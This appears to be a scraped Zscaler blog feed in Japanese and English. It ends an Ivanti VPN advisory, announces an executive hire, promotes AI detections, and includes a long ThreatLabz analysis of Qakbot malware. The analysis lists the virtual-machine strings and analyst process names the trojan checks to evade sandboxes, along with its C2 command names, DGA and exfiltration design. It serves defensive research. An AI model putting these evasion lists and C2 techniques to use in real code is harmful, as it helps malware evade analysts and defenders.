攻撃対象の最小化:アプリや脆弱なVPNをインターネットから隠し、不正侵入を阻止することで、攻撃者が最初のアクセスを入手できないようにします。
初期侵害の防止:すべてのトラフィックをインラインで検査し、ゼロデイ エクスプロイト、マルウェア、その他の高度な脅威を自動的に阻止します。
最小特権アクセスの施行:アイデンティティーとコンテキストを使用してユーザー、トラフィック、システム、アプリケーションへのアクセスを制限し、許可されたユーザーのみが指定のリソースにアクセスできるようにします。
不正アクセスのブロック:強力な多要素認証(MFA)を使用してユーザー アクセスのリクエストを検証します。
ラテラル ムーブメントの排除:ユーザーをネットワークではなくアプリに直接接続して、潜在的なインシデントの影響範囲を制限します。
侵害されたユーザーと内部脅威の検知:インライン検査と監視を有効にして、ネットワーク、プライベート アプリケーション、データにアクセスする侵害されたユーザーを検知します。
情報漏洩の阻止:攻撃中のデータの持ち出しを阻止するために、転送中データと保存データを検査します。
アクティブ ディフェンスの導入:デセプション テクノロジーを活用して脅威ハンティングを毎日実行し、攻撃者をリアルタイムであぶり出します。
セキュリティ文化の構築:多くの侵害は、フィッシング攻撃によって不正侵入された1つのユーザー アカウントから始まります。定期的なサイバーセキュリティ意識向上トレーニングを優先することで、このリスクを軽減し、従業員を侵害から守ることができます。
セキュリティ態勢の評価:サードパーティーによる定期的なリスク評価やパープル チームの活動を実施して、セキュリティ プログラムのギャップを特定して強化します。サービス プロバイダーやテクノロジー パートナーにも同様の措置を講じ、これらのレポートの結果をセキュリティ部門と共有させることが重要です。
まとめ
国家支援型のハッカーによって複数のゼロデイ脆弱性が悪用されたことで、IvantiのVPN製品は深刻なセキュリティ脅威に直面しています。最初の情報公開では、不正アクセスやリモートコ マンド インジェクションを可能にする重大なCVEが明らかになり、その後Ivantiがパッチをリリースすると、脅威アクターはすぐに特権昇格を可能にする2つの脆弱性を悪用しました。
CISAはアドバイザリーと緊急指令で対応し、最初の脆弱性を緩和するための期限を設定しました。2つの脆弱性が新たに確認され、パッチが提供されていない状況を受けて、CISAは補足指示を発行し、連邦政府機関に対し、2024年2月2日午後11時59分(米国東部標準時)までにIvanti ICSおよびIPSソリューションをネットワークから切り離すよう義務付けました。
Fri, 02 2月 2024 14:11:41 -0800Deepen Desaihttps://www.zscaler.jp/blogs/security-research/threatlabz-coverage-advisory-ivanti-s-vpn-vulnerabilities-exploited-hackersZscaler Appoints Steve McMahon as New Chief Customer Success Officer
https://www.zscaler.jp/blogs/company-news/zscaler-appoints-steve-mcmahon-new-chief-customer-success-officer
In the past year, Zscaler achieved a significant milestone by surpassing $2B in ARR. We take great pride in the fact that we accelerated from $1B to $2B ARR within a span of just seven quarters. Looking ahead, our sights are set on surpassing $5B ARR, a testament to our continuous growth and the trust placed in us by over 40% of Fortune 500 companies for their secure digital transformation. As we embark on this journey, we are diligently ensuring that our organizational structure and leadership are well-equipped to propel us to the next level of success.
While Zscaler has many impressive stats about its business, the stat I’m most proud of is the Net Promoter Score (NPS) of over 70 while the average NPS score for SaaS companies is 30. This is driven by our innovative architecture and customer obsession which are part of our key values. The organization that plays a critical role in making sure our customers are delighted is Customer Success. To scale the customer success organization and continue exceeding expectations of our global customers, I’m excited to welcome Steve McMahon to Zscaler as our new Chief Customer Success Officer. This strategic addition to our leadership lineup demonstrates our ongoing commitment to delivering exceptional customer experiences and driving long-term growth.
With over 25 years of customer success and services experience at a range of leading technology companies including Cisco, Splunk and, most recently, CrowdStrike, Steve has the expertise and know-how for developing strategies and programs that drive customer satisfaction, retention, and advocacy. His extensive experience in this space will enable us to further optimize our customer engagement model, ensuring that we are providing the right level of support at every stage of the customer journey.
The trusted relationship we establish and cultivate with our customers is paramount to our business, which is why customer obsession has always been at the heart of everything we do. I am confident that Steve’s contributions will have a positive impact on our organization and help us maintain our focus on driving customer loyalty and satisfaction.
Please join me in extending a warm welcome to Steve and a big thank you to the Zscaler team for your continued support and commitment to making Zscaler the leader in cloud security.
Wed, 31 1月 2024 11:01:44 -0800Jay Chaudhryhttps://www.zscaler.jp/blogs/company-news/zscaler-appoints-steve-mcmahon-new-chief-customer-success-officerTracking 15 Years of Qakbot Development
https://www.zscaler.jp/blogs/security-research/tracking-15-years-qakbot-development
Introduction
Qakbot (aka QBot or Pinkslipbot) is a malware trojan that has been used to operate one of the oldest and longest running cybercriminal enterprises. Qakbot has evolved from a banking trojan to a malware implant that can be used for lateral movement and the eventual deployment of ransomware. In August 2023, the Qakbot infrastructure was dismantled by law enforcement. However, just several months later in December 2023, the fifth (and latest) version of Qakbot was released, marking more than 15 years of development. In this blog, we will analyze Qakbot from the first version dating back to 2008 through the most recent version that continues to be updated as of January 2024. Our analysis demonstrates the threat actor behind Qakbot is resilient, persistent, and innovative.
Key Takeaways
Qakbot originated in 2008 as a banking trojan designed to steal credentials and conduct ACH, wire, and credit card fraud.
In recent years, Qakbot has become an initial access broker delivering Cobalt Strike for lateral movement and ultimately resulting in second-stage infections including ransomware like BlackBasta.
Over the years, Qakbot’s anti-analysis techniques have improved to evade malware sandboxes, antivirus software, and other security products.
The malware is modular and can download plugins that enable it to dynamically add new functionality.
The threat group behind Qakbot has now released five distinct versions of the malware with the latest release in December 2023.
A Brief History of Qakbot
ThreatLabz researchers have been tracking Qakbot for more than a decade and our analysis started with samples that date back to 2008. These early versions of Qakbot contained a date timestamp rather than a version number. However, we will refer to these samples as version 1.0.0 for clarity and consistency with subsequent versions. At that time, Qakbot leveraged a dropper with two embedded components in the resource section that consisted of a malicious DLL and a tool to inject the DLL into running processes. The Qakbot DLL implemented a wide variety of features including: a SOCKS5 server, stealing passwords, harvesting web browser cookies, and spreading via SMB. These early versions were heavily developed and even had a feature to report crash dumps. In 2011, Qakbot introduced a versioning system that started with 2.0.0 that has signified major developmental milestones over time. The Qakbot major version number is a three-digit hexadecimal value with 0x500 (or 5.0.0) being the most recent.
Qakbot was largely used for banking fraud until 2019, when the threat actor pivoted to serving as an initial access broker for ransomware including Conti, ProLock, Egregor, REvil, MegaCortex, and BlackBasta.
The following timeline illustrates the key developments for each version of Qakbot.
Each version of Qakbot represents a snapshot in time and is indicative of the threat landscape during that period. For instance, early versions contained hardcoded command-and-control (C2) servers. As time progressed, law enforcement and malware researchers worked successfully with domain registrars to suspend malicious domains. In response, the Qakbot threat actor added network encryption and implemented a solution to remove the C2 server’s single point of failure by adding a domain generation algorithm (DGA). While a DGA addressed the single point of failure issue, it also created significant noise when querying for a large number of domains. As a result, the Qakbot developer devised a new multi-tiered architecture that leveraged compromised systems to act as proxy servers that relay network traffic between other infected systems and the backend C2 infrastructure. This design update addressed the single point of failure problem, reduced network traffic, and effectively hid the subsequent C2 tiers.
In the following sections, we will analyze key areas where Qakbot has evolved significantly including anti-analysis techniques, network communication, and the implementation of a modular design.
Anti-Analysis Techniques
Qakbot has implemented anti-analysis techniques from the beginning of its development including string obfuscation, API obfuscation, and malware sandbox evasion.
String obfuscation
Every version of Qakbot since its inception has obfuscated the malware’s important strings with a simple XOR algorithm. The XOR key (and most recently, the derivation of an XOR key) is used to decrypt strings. Moreover, the reference structure to the strings has also evolved across versions.
In the first two versions (1.0 and 2.0), the malware decrypted a block of strings from the data section, overwriting the original encrypted block, and the unencrypted strings remained in memory as shown in Figure 1. This simple design was likely an attempt to evade static antivirus signatures.
Figure 1. Early versions of Qakbot string obfuscation
In later versions of Qakbot, the XOR key length was significantly increased, and strings were decrypted and copied to a newly allocated buffer. Qakbot version 5.0 made perhaps the most significant change to the string encryption algorithm. The strings are still encrypted with a simple XOR key. However, the XOR key is no longer hardcoded in the data section. Instead the XOR key is encrypted with AES, where the AES key is derived by performing a SHA256 hash of a buffer. A second buffer contains the AES initialization vector (IV) as the first 16 bytes, followed by the AES-encrypted XOR key. Once the XOR key has been decrypted, the block of encrypted strings can then be decrypted as shown in Figure 2.
Figure 2. Qakbot 5.0 string decryption
API obfuscation
In versions 1 and 2, Qakbot carried a list of Windows API names used by the malware in the encrypted strings table. After the strings table was decrypted, the code would dynamically resolve the address of each API at runtime and then initialize a table of pointers that could then be used by Qakbot to invoke the corresponding function when required. This implementation made it harder for malware researchers and antivirus software to statically determine the APIs used at runtime.
In more modern versions, the Qakbot developer further obfuscated the use of APIs by resolving the imports using a CRC32 hash rather than a string. At first, Qakbot used the CRC hashes of the API name directly, and subsequent versions performed an XOR with a hardcoded value and the CRC hash. Figure 3 shows an example of this dynamic API import hashing algorithm.
Figure 3. Example Qakbot API obfuscation
Junk code
Over time, Qakbot has introduced blocks of code that are deliberately non-functional to defeat static antivirus signatures as shown in Figure 4. In the example below, a block of junk code was added prior to an RC4 initialization routine.
Figure 4. Example of Qakbot junk code block in an RC4 initialization function
Anti-sandbox techniques
Qakbot has implemented numerous detection mechanisms to identify researcher environments and malware sandboxes since the earliest versions. In particular, Qakbot has attempted to identify processes, system artifacts, and the underlying virtual machines associated with an analysis environment. Figure 5 shows an example of Qakbot’s implementation to identify whether an infected system is running on a VMWare virtual machine from a sample dating back to September 2009.
Figure 5. Qakbot implementation to identify VMWare
Qakbot has continuously added code to identify analysis environments by checking system information such as the name of BIOS vendors, processes, drivers, etc. for strings as shown in Table 1.
vmxnet
vmx_svga
vmrawdsk
vmdebug
vm3dmp
vSockets
srootkit
sbtisht
ansfltr
Xen
XENVIF
XENSRC
XENCLASS
XENBUS
Vmscsi
VirtualBox
Virtual Machine
Virtual HD
VirtIO
VRTUAL
VMware server memory
VMware SVGA
VMware SCSI
VMware Replay
VMware Pointing
VMware Accelerated
VMware
VMW
VMAUDIO
VIRTUAL-DISK
VBoxVideo
QEMU
PROD_VIRTUAL_DISK
MS_VM_CERT
CWSandbox
20202020
Table 1. Qakbot virtual machine string-based detections
The following processes in Table 2 are frequently used by malware analysts and are also detected by Qakbot:
frida-winjector-helper-32.exe
packetcapture.exe
filemon.exe
proc_analyzer.exe
sniff_hit.exe
frida-winjector-helper-64.exe
capturenet.exe
procmon.exe
sysAnalyzer.exe
sysAnalyzer.exe
tcpdump.exe
qak_proxy
idaq64.exe
sniff_hit.exe
BehaviorDumper.exe
windump.exe
dumpcap.exe
loaddll32.exe
joeboxcontrol.exe
processdumperx64.exe
ethereal.exe
CFF Explorer.exe
PETools.exe
joeboxserver.exe
anti-virus.EXE
wireshark.exe
not_rundll32.exe
ImportREC.exe
ResourceHacker.exe
sysinfoX64.exe
ettercap.exe
ProcessHacker.exe
LordPE.exe
x64dbg.exe
sctoolswrapper.exe
rtsniff.exe
tcpview.exe
SysInspector.exe
Fiddler.exe
sysinfoX64.exe
FakeExplorer.exe
apimonitor-x86.exe
idaq.exe
dumper64.exe
user_imitator.exe
Table 2. Malware analyst process names detected by Qakbot
Around version 404.510, the malware developer added extraneous exports to the Qakbot stager DLL to confuse malware sandboxes as shown in Figure 6. In this example, the export name Wind (or ordinal #458) is the actual entry point.
Figure 6. Qakbot 404.510 sample with 458 entries in the exports directory
Network Communication
Qakbot has leveraged HTTP for C2 communication from the beginning. However, the network protocol on top of HTTP has changed significantly over the years with encryption, RSA signature verification, and the addition of a JSON-based message format.
Network protocol and encryption
Qakbot has continuously updated its message protocol with version 19 being the latest. The protocol specifies the format of the message. In version 3, Qakbot sent requests in a format similar to the following:
However, this protocol format was later replaced with a JSON-based protocol with integer key values that denote specific fields as shown below:
This encoding adds a layer of obfuscation for each of the message fields.
Qakbot’s network encryption has used RC4 with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA1. The most recent version of Qakbot now uses AES encryption with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA256. After encryption, the data is Base64 encoded and prepended to a variable in the body of an HTTP POST request.
Domain generation algorithm
The first versions of Qakbot only used hardcoded C2s as shown in Figure 7.
Figure 7. Example of hardcoded Qakbot C2s
However, in version 2.0.1 a DGA was added as a backup C2 channel in the event that the hardcoded C2s were unreachable. Qakbot used a time-based DGA to generate up to 5,000 C2 domains for a specific date interval as shown in Figure 8.
Figure 8. Qakbot DGA code
Interestingly, some versions of Qakbot would generate fake domains if an analysis environment was detected in an effort to mislead researchers, as shown in Figure 9.
Figure 9. Example of Qakbot generating fake domains if network monitoring tools were detected
Data exfiltration to compromised FTP servers
Qakbot versions 3.0.0 and earlier used compromised FTP servers to exfiltrate data rather than sending the data directly to their C2 server. The FTP credentials were stored in Qakbot’s configuration files as shown below:
This design had an inherent weakness since anyone with the FTP credentials could potentially have accessed and recovered the stolen information. To address this weakness, Qakbot was later updated to send the stolen data directly to Qakbot’s C2 infrastructure.
Using compromised systems as relays
After version 3.2.4.8, Qakbot ceased using the DGA. Instead, Qakbot started using compromised systems themselves as C2 servers, and embedded a list of IP addresses and port numbers in the malware configuration. Before version 4.0.3.2, the configuration file (stored as an encrypted resource) contained the list of IP addresses in a text-based format:
However, after version 4.0.3.2, the Qakbot C2 list evolved into a binary format as shown in Figure 10.
Figure 10. Qakbot C2 list binary format
Commands
In the first versions of Qakbot, the server sent commands in a descriptive text-based format. The following commands were supported in Qakbot versions 1.0 and 2.0:
certssave
ckkill
cksave
clearvars
cron
cronload
cronsave
forceexec
ftpwork
getip
install3
instwd
kill
killall
loadconf
nbscan
psdump
reload
rm
saveconf
sleep
socks
sxordec
sxorenc
sysinfo
thkill
thkillall
uninstall
update
update_finish
uploaddata
var
wget
In order to obfuscate these commands, the Qakbot author replaced these string commands with integer values starting in the later builds of version 3.
Addition of RSA signature verification
Qakbot version 3.0.0.443 introduced RSA digital signatures (initially using the MatrixSSL library) to prevent tampering. This was especially important when the DGA and compromised systems were used as C2 servers.
Modular Structure
The design of Qakbot has changed significantly from versions 1 through 5. In particular, the malware has become more modular with the ability to dynamically add new features without releasing a new version of Qakbot. Modern versions use a lightweight stager responsible for initializing, maintaining persistence, and establishing C2 communication to request commands and modules.
Embedded resources
Prior to version 4.0.2.19, Qakbot frequently used the resource section to store configuration information (such as web injects and application parameters) as well as DLLs that performed malicious behavior. Initially, in version 1.0, these resources were not encrypted. However, Qakbot’s code evolved with various encryption algorithms to protect these resources.
Qakbot version 2.0 implemented a custom XOR-based algorithm as shown in Figure 11.
Figure 11. Custom encryption algorithm used by Qakbot 2.0 to protect resources
In this example, the offset 0x7 in the encrypted resource contained a WORD that was the size of the XOR key. The XOR key was located at offset 0x9 in the resource. Encrypted data was then concatenated after the XOR key. Python code that replicates this algorithm is shown below:
Qakbot version 3.0 and later used an RC4-based algorithm to decrypt the resources.
The initial 0x14 bytes in the resource served as the RC4 key for decrypting the remaining data. A slightly modified version of the BriefLZ library was later added to compress specific resources to reduce the overall file size.
In version 4.0.2.1, the resource encryption algorithm changed slightly. The first 0x14 bytes of the resource were no longer used as an RC4 key. Instead, the code contained a salt value in the encrypted strings table that was then hashed using SHA1 to derive the RC4 key used to decrypt the resource. In version 4.0.3.902 this was improved again, which added two layers of RC4 to decrypt the resource. The first RC4 layer was decrypted using the SHA1 hash of the salt string. The second layer used the first 0x14 bytes of the result as the key to decrypt the following data. Example Python code for this algorithm is shown below:
Plugins
In version 4.0.1, Qakbot was modified to split various functionality into separate modules. This allowed Qakbot to use a stager to download additional modules from Qabkot’s C2 servers to add functionality on-demand. Qakbot has built modules to hook web browsers, steal email addresses (and email), harvest stored credentials, deploy Cobalt Strike, and act as a C2 server that relays traffic between other infected systems and the backend infrastructure.
Conclusion
Qakbot is a sophisticated trojan that has evolved significantly over the past 15 years, and remains remarkably persistent and resilient. Despite the significant disruption to Qakbot in August 2023, the threat group remains active and recently updated their codebase to support 64-bit versions of Windows, improved the encryption algorithms, and added more obfuscation. This demonstrates that Qakbot will likely remain a threat for the foreseeable future and ThreatLabz will continue to add detections to protect customers.
Zscaler Cloud Sandbox
Zscaler’s multilayered cloud security platform detects payloads with the following threat names:
Win32.Banker.Qakbot
Indicators Of Compromise (IOCs)
Date
Version
Sample Hash
2008-08-28
1.0.0
34588857312371e4b789fb49d2606386
2009-11-16
1.0.0
8c33780752e14b73840fb5cff9d31ba1
2009-12-29
1.0.0
37bbdaf1d14efa438f9ff34d8eeaa5e7
2010-10-12
1.0.0.63
d02252d88c3eab14488e6b404d2534eb
2011-05-12
2.0.0.685
b9e23bc3e496a159856fd60e397452a0
2012-05-31
2.0.1.1432
570547fa75c15e6eb9e651f2a2ee0749
2013-07-08
2.0.1.1457
42e724dc232c4055273abb1730d89f28
2014-06-24
2.0.1.2544
9160ea12dbce912153b15db421bb87da
2015-01-28
2.0.1.2674
945ba16316c8a6a8428f0b50db0381dc
2015-12-17
3.0.0.116
dca0ef26493b9ac3172adf931f1a3499
2016-01-04
3.0.0.180
6718c6af4b89cffd9b6e0c235cf85bd2
2016-01-04
3.0.0.275
8fbb43dc853d0b95829112931493fe22
2016-01-13
3.0.0.262
72125013ac58d05adb32b7406b02c296
2016-01-29
3.0.0.322
3b4a2e984a51210d0594c9b555ba4e0d
2016-02-09
3.0.0.333
f952dc1e942ebdfb95a2347263265438
2016-02-12
3.0.0.352
b849381ab6a4e97d32580bb52d15cb7d
2016-03-08
3.0.0.443
dc8b137d5d61b23dbbb6085ce46bfcdb
2016-04-05
3.0.0.468
327a5e491d6db899d9db4c6bdc8f5367
2016-04-05
3.0.0.473
e3b0e54777ca9fd9863e3563a1b7dd59
2016-04-06
3.0.0.506
2e9261e75e15540ef88327a480a5b10e
2016-04-26
3.0.0.580
a472b9dd64198d739c6e415bbcae8a6f
2016-05-19
3.0.0.739
8609e6e4d01d9ef755832b326450cbe9
2016-06-01
3.0.0.743
a7cc19cde3a1a78b506410e4ffafdbef
2017-04-27
3.1.0.723
581016035f95327e7e1daac3ad55ae0e
2017-05-16
3.1.0.733
361d46f32a93786b34b2ac225efc0f79
2018-02-06
3.2.2.381
89e6f171c29255d6b4490774c630ad14
2019-09-16
3.2.3.91
ff186a1ef9e83c229940ff2dd4556eaf
2020-01-22
3.2.4.8
bea66da7088bd20adbfed57cf350a6a4
2020-01-22
3.2.4.8
1cd7a95064515625ad90464a65ea4d94
2020-03-03
3.2.4.53
08c51514a42eec6ccbbc7a09a8258419
2020-03-20
3.2.4.70
d8ff9d18cd622c545d21b199a2d17594
2020-04-01
3.2.4.75
2e658f5fa658651331cb5b16447bdbe2
2020-04-29
3.2.4.136
ca22283396dbe21fa2ef5e27c85ffae6
2020-05-07
3.2.4.141
e9d0e767a5c5284ab33a3bb80687cf63
2020-05-07
3.2.4.141
d8841201c9d32b5e885f4d035e32f654
2020-05-28
3.2.4.401
82d7c5ea49c97059bbec02161b36f468
2020-08-07
3.2.5.42
163ee88405bccc383c7b69c39028bf9a
2020-08-07
3.2.5.42
acf65632b7cdc40091daec58bf8830bc
2020-08-11
3.2.5.43
455c543243f5216e21ba045814311971
2020-08-11
3.2.5.43
cfc77e4421d830e73c6f6040a4baedd4
2020-11-03
3.2.5.83
40a9bdac882285ab844917d8b5b75188
2020-11-24
4.0.1.29
6b1771b883c0b3ffdc3f5923f45c1f93
2020-12-15
4.0.1.138
0a3caa2845251b8fb5ab72f450edd488
2021-03-12
4.0.1.194
4a6e7f055d5bf4fd6d2a401c1b3d18ab
2021-04-12
4.0.2.1
dc2acf1704456880208146c91692cfc8
2021-04-15
4.0.2.12
3ca1f0e708283f21c9a10ef4acf40990
2021-04-15
4.0.2.12
1e71ea79c5a70bb8c729037132855b5a
2021-04-22
4.0.2.12
66a87dbc24af866849646911f4841a28
2021-04-29
4.0.2.68
25984af48fa27ec36bd257f8478aa628
2021-04-29
4.0.2.68
c1849c1ee3b8146c6fb836dae0b64652
2021-05-06
4.0.2.68
d45e04df3c9270a01e9fb9e4e8006acc
2021-09-20
4.0.2.318
9a1c1497428743b4e199f2583f3d8390
2021-09-27
4.0.2.363
0865757dfe54c2d01c5cef5bfd3162c5
2021-09-27
4.0.2.363
c6dea1f4e6ee1ed4c0383cd1af456649
2021-11-03
4.0.3.1
1d4952cbe998312fd2bf810535db8a20
2021-11-03
4.0.3.1
6cce1ec83d1428de9fcb0c3791efabd1
2021-11-04
4.0.3.2
e111d982dc0c12f23fa3f446d674600b
2021-11-04
4.0.3.2
751f7d8ad6b2308cd1750fc23f606b53
2021-12-09
4.0.3.10
8bb4208a50c041f9cdfc26815905eab3
2022-02-10
4.0.3.490
bcb8e64c5a69c7a572ca34450712fb2f
2022-02-14
4.0.3.491
54e3f20f74c1089e89841798ffaac084
2022-02-14
4.0.3.503
95adeb6a1c1e0a9d9ee4ecafb6079b37
2022-02-15
4.0.3.509
da206d25fddf3286f42ec7626d8bb676
2022-02-18
4.0.3.532
3ba490216d4cdf92661444d896fefac3
2022-02-24
4.0.3.549
8fa26ff07c3b5e1653e55b8a567b7623
2022-02-24
4.0.3.549
1253695c63136edb1f6b37bbfd83db55
2022-04-06
4.0.3.573
2853985cab3c5b83eec38ae1f3a890be
2022-04-29
4.0.3.573
5e7deb4acb4429498693bc45db68978a
2022-05-04
4.0.3.674
2273dd59ca71c4f078cab09d93093294
2022-05-04
4.0.3.675
40d5e775a52c94842c97d012eb94efdc
2022-05-04
4.0.3.683
f1d47a4dc1d11b17e51419299dc282e4
2022-05-12
4.0.3.684
2f17bd9f4b9edd91a7fd80ef32981f70
2022-05-18
4.0.3.686
7dcbd74778754eee85810a4393d8e3ef
2022-05-18
4.0.3.688
e9e9d194f3ee9822852309cc83455eea
2022-05-23
4.0.3.689
019117f66e43de489b3ff56377f9907b
2022-05-24
4.0.3.690
28f84ffa14c7ef3936a00d3bd751bdb3
2022-06-07
4.0.3.694
d88ee89344d04f83eacd3614785560ef
2022-08-31
4.0.3.780
3ff9d9dbf8c7a6865faeb43188afa6b4
2022-09-06
4.0.3.858
3e86ac10b4e7d818e0f410130bb7f237
2022-09-08
4.0.3.860
377acb7149fdfa56c090d9a12619a53c
2022-09-15
4.0.3.892
e5ebdec7417ad847e4325c4114e41809
2022-09-20
4.0.3.894
c23d2cd7d10a5f88032ddfcab4cfe146
2022-09-28
4.0.3.895
050ce5fb25ffd3e907a5c81a6711fcea
2022-10-04
4.0.3.914
b857efb30d9e35bc83a294580ad8cc3a
2022-10-10
4.0.3.967
6dc027269262b93351633eb8af4623ef
2022-10-11
4.0.3.973
e5eb07b009ca666f91ef5fe48269ca52
2022-10-25
4.0.3.1051
0971b8e78fcc6f9158e279376116c8c4
2022-10-26
4.0.4.2
4fbebc9879ec1f95e759cb8b5d9fb89d
2022-10-28
4.0.4.14
66a0741f8f43b584e387459b367097c1
2022-10-31
4.0.4.20
6d61a88890be4ab5116cb712ff7788f4
2022-11-08
4.0.4.26
da75924c717524a8d17de126f8368ec4
2022-11-08
4.0.4.27
5971c4a485e881268ca28f24fdedc4e5
2022-11-16
4.0.4.30
22e45a212998d2ee264b6756b2972901
2022-11-28
4.0.4.46
accc6d9ba88040c89df34ef1749944d1
2022-12-13
4.0.4.52
22b3cb9b0bacd525a83aab5b1a853f63
2022-12-20
4.0.4.60
bebebd4e16a88f43f16e4c6c811c9894
2022-12-20
4.0.4.62
cafb7b2f8383cf9686f144dc2082f287
2022-12-22
4.0.4.66
6e3b4252903c0f3a153e011445ad2179
2023-01-31
4.0.4.432
3e3bc981a7fdbae10b40cd6683edacbb
2023-01-31
4.0.4.432
a12dd4324bbf1129d9fae1b3d1e6b9ca
2023-05-02
4.0.4.1035
ebec03d53d716cd780c92c5c29a95e6b
2023-05-10
4.0.4.1038
5e4c95b2c1b14a8a0f425576189fae60
2023-12-11
5.0.0.326
8aec3f3ef66e4ff118bfdab1d031eadb
2023-12-13
5.0.0.361
46e169516479d0614b663f302b5d1ace
2023-12-19
5.0.0.370
795319d48ce1f680699beb03317c6bff
2024-01-22
5.0.0.484
de1d9ed6da4f34b4444b13442aac5033
2024-01-22
5.0.0.486
f382d0f92221831eeb39c108f8ccfa26
Wed, 31 1月 2024 08:31:01 -0800Javier Vicentehttps://www.zscaler.jp/blogs/security-research/tracking-15-years-qakbot-developmentAI Detections Across the Attack Chain
https://www.zscaler.jp/blogs/product-insights/ai-detections-across-attack-chain
Organizations face a constant barrage of cyberthreats. To combat these sophisticated attacks, Zscaler delivers layered security protections to deliver more effective security postures across the four key stages of an attack - attack surface discovery, compromise, lateral movement, and data exfiltration.
Heading into 2024, with all the buzz surrounding artificial intelligence (AI) over the past year, we are asked daily by prospects and customers, "Zscaler, how do you use AI to keep us safer?" For more on where we see AI and security headed in 2024, please see the blog from our founder, Jay Chaudhry.
In this blog, we will explore a handful of examples of Zscaler AI use across key stages of an attack—demonstrating how it can detect and stop threats, protect data, and make teams more efficient. Truth be told, we began to add AI detections into our portfolio some years ago to further bolster other detection methods, and it has paid off.
Stage 1: Attack surface discovery
While we will spend the better part of this blog discussing AI in other areas, the first stage of an attack involves attackers probing attack surfaces to identify potential weaknesses be exploited. These are often things like VPN/firewall misconfigurations or vulnerabilities, or unpatched servers. We wholeheartedly suggest considering ways to cloak your currently discoverable applications behind Zscaler to immediately reduce your attack surface and reduce your risk of successful attacks
Stage 2: Risk of compromise
During the compromise stage, attackers exploit vulnerabilities to gain unauthorized access to employee systems or applications. Zscaler's AI-powered products help reduce risk of compromise while prioritizing productivity.
AI-powered phishing/C2 prevention: We better detect and stop credential theft and browser exploitation from phishing pages with real-time analytics on threat intelligence from 300 trillion daily signals, ThreatLabz research, and dynamic browser isolation. This means our AI makes us even more efficient in detecting new phishing or C2 domains.
File-based attacks: We use AI in our cloud sandbox to ensure there is no tradeoff between security and productivity. Historically, in the case of the sandbox, a new file arrives and users must wait as it is analyzed, interrupting productivity. Our AI Instant Verdict in the sandbox prevents patient zero infections by instantly blocking high-confidence malicious files using AI, eliminated the need to wait for analysis on file we feel are very likely malicious. Our model fidelity is a result of years of ongoing training, analysis, and tuning interactions based on over 550 million file samples.
AI to block web threats: Additionally, Zscaler's AI-powered browser isolation blocks zero day threats while ensuring employees can access the right sites to get their jobs done. URL filtering is effective in keeping users safe, but given that sites are either allowed or blocked, sometimes sites that are blocked are safe and needed for work. This is a productivity drain as users cannot access legitimate sites for work, resulting in unnecessary helpdesk tickets. AI Smart Isolation determines when a site might be risky and open it in isolation. This means organizations don't have to overblock sites to support productivity and can also maintain a strong web security posture.
Stage 3: Lateral movement
Once inside an organization, attackers attempt to move laterally to gain access to sensitive data. Zscaler's AI innovation reduces potential blast radius by employing automated app segmentation based on analysis of user access patterns to limit lateral movement risk. For instance, if we see only 250 of 4,500 employees accessing a finance application, we will use this data to automatically create an app segment that limits access to only those 250 employees, thus reducing potential blast radius and lateral movement opportunity by ~94 percent.
Stage 4: Data exfiltration
The final stage of an attack involves the unauthorized exfiltration of sensitive data from a company. Zscaler uses AI to allow companies to deploy data protections faster to protect sensitive data. With AI-driven data discovery, organizations no longer struggle with the time-consuming task of data fingerprinting and classification that delays deployment. Innovative data discovery automatically finds and classifies all data out of the box. This means data is classified as sensitive information immediately, so it can be protected right away from potential exfiltration and data breaches
Zscaler's AI-driven security products provide organizations with robust protection across the four key stages of an attack. We also rely on AI to deliver cybersecurity maturity assessments as part of our Risk360 cyber risk management product. Rest assured, we are busy thinking, building, and adding new AI capabilities every day, so there is more to come, as AI-powered security is becoming indispensable in safeguarding organizations against cyberthreats.
Fri, 26 1月 2024 08:00:01 -0800Dan Gouldhttps://www.zscaler.jp/blogs/product-insights/ai-detections-across-attack-chainクラウド ワークロード:2024年のサイバーセキュリティに関する予測
https://www.zscaler.jp/blogs/product-insights/cloud-workloads-cybersecurity-predictions-2024
2023年、クラウド セキュリティ市場は大きな転換期を迎えました。ベンダー、製品、インフラなど、エコシステムのあらゆる側面が急激に変化しています。各組織はクラウド化の推進とセキュリティ要件への対応を両立させるための取り組みを継続しており、パブリック クラウドのワークロード(VM、コンテナー、サービス)を対象としたサイバーセキュリティは2024年も進化を続けると見られます。こうした流れの中、CIOやCISOは、ポイント製品の統合、複数のクラウド(AWS、Azure、GCP)のサポート、自動化によるセキュリティ運用の拡大が可能なセキュリティ プラットフォームの構築を自らのチームに求めていくでしょう。結果として、クラウド ワークロードの保護、リアルタイムのデータ保護、一元的なポリシーの適用といった領域で、ゼロトラスト アーキテクチャーが存在感を発揮していくことが見込まれます。以下では、2024年に広がっていくと見られる重要な傾向を5つ紹介します。
1. オンプレミス環境からクラウドへの脅威のラテラル ムーブメントが増加する
クラウドは、アプリケーションとデータという組織の最重要資産の接続先になっています。攻撃者は新たな手法を取り入れており、組織のオンプレミス ネットワークへの侵入を足がかりに、ラテラル ムーブメントによってクラウド ドメインに移動するケースもあります。オンプレミス環境とパブリック クラウド環境の間に根強く残る整合性の欠如のため、こうした手法は脅威アクターの間で一般化しつつあります。
Microsoft Securityの調査チームは、この好例となる攻撃を詳しく紹介しています(出典:MERCURY and DEV-1084: Destructive attack on hybrid environment)。脅威アクターは最初に2つの特権アカウントを侵害し、次にそれらを利用してAzure Active Directory (Azure AD) Connectエージェントを操作しました。ランサムウェアを展開する2週間前に、侵害した高度な特権を持つアカウントを用いてAzure AD Connectエージェントがインストールされているデバイスにアクセスしていたのです。脅威アクターがその後AADInternalsツールを利用し、特権のあるAzure ADアカウントのプレーンテキストの資格情報を抽出したのは間違いないと見られます。この資格情報はその後、ターゲットのオンプレミス環境からターゲットのAzure AD環境への移動に利用されました。
図:オンプレミス環境の侵害を足がかりにしたパブリック クラウドへの移動
2. サーバーレス サービスによって攻撃対象領域が大幅に拡大する
